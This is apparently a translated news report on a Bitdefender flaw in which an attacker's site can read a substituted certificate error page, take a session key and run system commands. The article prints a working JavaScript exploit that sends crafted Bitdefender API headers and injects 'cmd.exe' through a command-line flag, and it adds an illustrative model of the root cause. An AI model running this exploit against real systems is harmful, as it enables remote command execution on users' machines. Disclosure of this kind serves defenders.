Vladimir Palant, the creator of Adblock Plus,
The cause of the problem is that the Bitdefender antivirus intercepts HTTPS traffic locally by replacing the site's original TLS certificate. An additional root certificate is installed on the client's system, which makes it possible to hide the operation of the traffic inspection system in use. The antivirus wedges itself into the protected traffic and inserts its own JavaScript code into some pages to implement the Safe Search function, and when there is a problem with the certificate of a secure connection, it replaces the returned error page with its own. Since the new error page is served on behalf of the server being opened, other pages on that server have full access to the content inserted by Bitdefender.
When a site controlled by an attacker is opened, that site can send an XMLHttpRequest and feign a problem with the HTTPS certificate in its response, which causes Bitdefender to return its substituted error page. Since the error page is opened in the context of the attacker's domain, the attacker's site can read the contents of the substituted page, including the Bitdefender parameters. The page provided by Bitdefender also contains a session key that makes it possible to use the internal Bitdefender API to launch a separate Safepay browser session with arbitrary command-line flags, and to run any system commands by using the "--utility-cmd-prefix" flag. An example of exploitation (param1 and param2 are values obtained from the error page):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// param1 and param2 are the values read from the Bitdefender error page
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
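The root cause described above, modelled as an added example (not code from the original article or from Bitdefender): a simplified same-origin check showing why an error page substituted in place is readable by the page that triggered the request, while a hypothetical hardened design that serves it from a dedicated origin without session secrets is not. The URLs, the token value and all function names are assumptions made for illustration.

```javascript
// Added example: a simplified model of the browser's same-origin rule.
// Every URL and the token value below are constructed.

// An origin is the (scheme, host, port) triple; URL.origin normalises default ports.
function originOf(url) {
  return new URL(url).origin;
}

// Can a script on `pageUrl` read a response the browser attributes to
// `responseUrl`? Same origin: yes. Cross origin: only if the response
// opts in through Access-Control-Allow-Origin.
function canRead(pageUrl, responseUrl, allowOriginHeader = null) {
  const page = originOf(pageUrl);
  if (page === originOf(responseUrl)) return true;
  return allowOriginHeader === "*" || allowOriginHeader === page;
}

// Model of a local HTTPS-inspecting proxy producing its certificate error page.
// "in-place": the body is substituted into the response for the requested URL,
//             so the browser attributes it to the requested site's origin.
// "dedicated-origin" (hypothetical hardened design): the error page lives on
//             a product-owned origin and carries no session secret.
function buildErrorResponse(requestedUrl, design) {
  if (design === "in-place") {
    return { url: requestedUrl, allowOrigin: null,
             body: { sessionToken: "CONSTRUCTED-TOKEN" } };
  }
  return { url: "https://interceptor-errors.invalid/cert-error",
           allowOrigin: null, body: { sessionToken: null } };
}

// Audit one design: does a page on the untrusted site get to read the
// error page, and does that read expose a session token?
function auditDesign(design) {
  const page = "https://untrusted.example/index.html";
  const requested = "https://untrusted.example/resource";
  const res = buildErrorResponse(requested, design);
  const readable = canRead(page, res.url, res.allowOrigin);
  return { design, readable,
           tokenExposed: readable && res.body.sessionToken !== null };
}

for (const d of ["in-place", "dedicated-origin"]) {
  console.log(JSON.stringify(auditDesign(d)));
}
```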
Recall that a study conducted in 2017
Only 11 of the 26 products offered up-to-date cipher suites. 5 systems did not verify certificates (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). The Kaspersky Internet Security and Total Security products were susceptible to the attack
Source: opennet.ru